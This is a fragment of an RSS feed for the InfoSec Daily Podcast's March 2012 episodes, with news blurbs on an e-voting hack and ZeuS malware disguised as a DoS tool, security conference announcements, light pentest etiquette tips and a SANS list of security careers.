<p><b><span style="font-size: 15px;font-family: Arial;vertical-align: baseline">RSA 2012</span><span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline"> Security experts have warned that electronic voting systems are decades away from being secure, and to prove it a team from the University of Michigan successfully got the foul-mouthed, drunken Futurama robot Bender elected to head of a school board.</span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">In 2010 the Washington DC election board announced it had set up an e-voting system for absentee ballots and was planning to use it in an election. However, to test the system, it invited the security community and members of the public to try and hack it three weeks before the election.</span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">&quot;It was too good an opportunity to pass up,&quot; explained Professor Alex Halderman from the University of Michigan. &quot;How often do you get the chance to hack a government network without the possibility of going to jail?&quot;</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">&#8230;</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Source: </span><a href="http://www.theregister.co.uk/2012/03/02/trojan_attack_tool_targets_hacktivists/"><span>http://www.theregister.co.uk/2012/03/02/trojan_attack_tool_targets_hacktivists/</span></a></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">Anonymous supporters queuing up to participate in denial-of-service attacks are being tricked into installing ZeuS botnet clients.</span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">Hacktivists grabbed what they thought was the Slowloris tool, which is designed to flood websites with open connections and ultimately knock them offline. However, the download included a strain of ZeuS, which promptly installed itself on their Microsoft Windows machines.</span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">The Trojan will carry out the distributed attacks, but that&#039;s not all it does &#8211; it&#039;ll also steal users&#039; online banking credentials, webmail logins, and cookies.</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">&#8230;</span></b></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-610-weekend-wrap-up-with-dr-b0n3z/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3580/0/infosec-daily-podcast-episode-610.mp3" length="57265841" type="audio/mpeg" />
		<itunes:duration>0:59:39</itunes:duration>
		<itunes:subtitle>Episode 610 &#8211; Weekend Wrap-up with Dr. b0n3z
	InfoSec Daily Podcast Episode 610 for March 3, 2012. &#160;Tonight&#039;s podcast is hosted by Dr. Bonez, Boris Sverdlik, and Themson Mester.
Guests: aricon, oncee, connection, and spridel
&#160;
A[...]</itunes:subtitle>
		<itunes:summary>Episode 610 &#8211; Weekend Wrap-up with Dr. b0n3z
	InfoSec Daily Podcast Episode 610 for March 3, 2012. &#160;Tonight&#039;s podcast is hosted by Dr. Bonez, Boris Sverdlik, and Themson Mester.
Guests: aricon, oncee, connection, and spridel
&#160;
Announcements:
Social Engineering Training
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
	http://www.social-engineer.com/social-engineer-training
InfoSec Southwest
	When: March 30-April 1
	Where: Austin, TX
	http://www.Infosecsouthwest.com
Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia
	http://aide.marshall.edu
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA http://www.sans.org/mentor/details.php?nid=28014
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
Defcon 20
	When: July 26-29, 2012
	Where: Rio Hotel and Casino &#8211; Las Vegas, NV
	http://defcon.org/
	CFP &#38; Room reservations now open!
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
You don't have a sufficient version of Flash Player to display this animation.
Pentest Lessons:
	

During a pentest, if you upload a web shell to a website, at least password protect it so someone else does not make use of it too. 
If you tell the customer you will have their report on a particular date, then you better make every effort to make that deadline!
After a pentest, make sure you clean up after yourself (i.e. do not leave the systems worse than you found them).
Popping a server with the same account as the one you previously created, the year before, is probably more than just cheating.
If you IP is included in the assessment scope (internal NVA/PT), make sure to remove any findings from the report that relate to your box.
When performing a pentest, make sure that the box you are targeting is not your box (or a VM on your box).
Always back up your pentest/assessment data. You never know when the hard-drive in your system will decide to die!

&#160;
Stories
Source: &#160;https://www.sans.org/20coolestcareers/

#1 Information Security Crime Investigator/Forensics Expert
#2 System, Network, and/or Web Penetration Tester
#3 Forensic Analyst
#4 Incident Responder
#5 Security Architect
#6 Malware Analyst
#7 Network Security Engineer
#8 Security Analyst
#9 Computer Crime Investigator
#10 CISO/ISO or Director of Security
#11 Application Penetration Tester
#12 Security Operations Center Analyst
#13 Prosecutor Specializing in Information Security Crime
#14 Technical Director and Deputy CISO
#15 Intrusion Analyst
#16 Vulnerability Researcher/ Exploit Developer
#17 Security Auditor
#18 Security-savvy Software Developer
#19 Security Maven in an Application Developer Organization
#20 Disaster Recovery/Business Continuity Analyst/Manager

&#8230;
Source: http://animalnewyork.com/2012/02/the-department-of-homeland-security-is-searching-your-facebook-and-twitter-for-these-words/
The Department of Homeland Security monitors your updates on social networks, inc[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 609 &#8211; Sexy Career Paths, Friday FUD, 8 Stolen Bitcoins, WOA Stillbirth? and Infiltrated</title>
		<link>http://www.isdpodcast.com/episode-609-sexy-career-paths-friday-fud-8-stolen-bitcoins-woa-stillbirth-and-infiltrated</link>
		<comments>http://www.isdpodcast.com/episode-609-sexy-career-paths-friday-fud-8-stolen-bitcoins-woa-stillbirth-and-infiltrated#comments</comments>
		<pubDate>Sat, 03 Mar 2012 01:47:43 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3576</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 609 for March 2, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Karthik Rangarajan, Geordy Rostad, and Dr. Bonez. &#160; Announcements: Social Engineering Training When: July 21-24, 2012 Where: Black Hat Vegas When: August 20-24, 2012 Where: &#160;Bristol, UK When: &#160;November 12-16, 2012 Where: &#160;Columbia, MD http://www.social-engineer.com/social-engineer-training InfoSec Southwest When: March [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 609 for March 2, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Karthik Rangarajan, Geordy Rostad, and Dr. Bonez.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Southwest</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 30-April 1</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Austin, TX</span><br />
	<a href="http://www.infosecsouthwest.com/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.Infosecsouthwest.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span><br />
	&nbsp;</p>
<h5 dir="ltr"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></h5>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 23 &#8211; 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Black Hat Vegas</span><br />
	<a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Defcon 20</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 26-29, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Rio Hotel and Casino &#8211; Las Vegas, NV</span><br />
	<a href="http://defcon.org/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://defcon.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP &amp; Room reservations now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="https://www.sans.org/20coolestcareers/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://www.sans.org/20coolestcareers/</span></a></p>
<ul>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">#1 Information Security Crime Investigator/Forensics Expert</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">#2 System, Network, and/or Web Penetration Tester</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">#3 Forensic Analyst</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">#4 Incident Responder</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">#5 Security Architect</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">#6 Malware Analyst</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">#7 Network Security Engineer</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">#8 Security Analyst</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">#9 Computer Crime Investigator</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">#10 CISO/ISO or Director of Security</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">#11 Application Penetration Tester</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">#12 Security Operations Center Analyst</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">#13 Prosecutor Specializing in Information Security Crime</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">#14 Technical Director and Deputy CISO</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">#15 Intrusion Analyst</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">#16 Vulnerability Researcher/ Exploit Developer</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">#17 Security Auditor</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">#18 Security-savvy Software Developer</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">#19 Security Maven in an Application Developer Organization</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">#20 Disaster Recovery/Business Continuity Analyst/Manager</span></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-609-sexy-career-paths-friday-fud-8-stolen-bitcoins-woa-stillbirth-and-infiltrated/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3576/0/infosec-daily-podcast-episode-609.mp3" length="18165637" type="audio/mpeg" />
		<itunes:duration>0:37:48</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 609 for March 2, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Karthik Rangarajan, Geordy Rostad, and Dr. Bonez.
	&#160;
Announcements:
Social Engineering Training
	When: July 21-24, 2012
	Where: Black Hat [...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 609 for March 2, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Karthik Rangarajan, Geordy Rostad, and Dr. Bonez.
	&#160;
Announcements:
Social Engineering Training
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	InfoSec Southwest
	When: March 30-April 1
	Where: Austin, TX
	http://www.Infosecsouthwest.com
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA http://www.sans.org/mentor/details.php?nid=28014
	Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
	Defcon 20
	When: July 26-29, 2012
	Where: Rio Hotel and Casino &#8211; Las Vegas, NV
	http://defcon.org/
	CFP &#38; Room reservations now open!
	DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
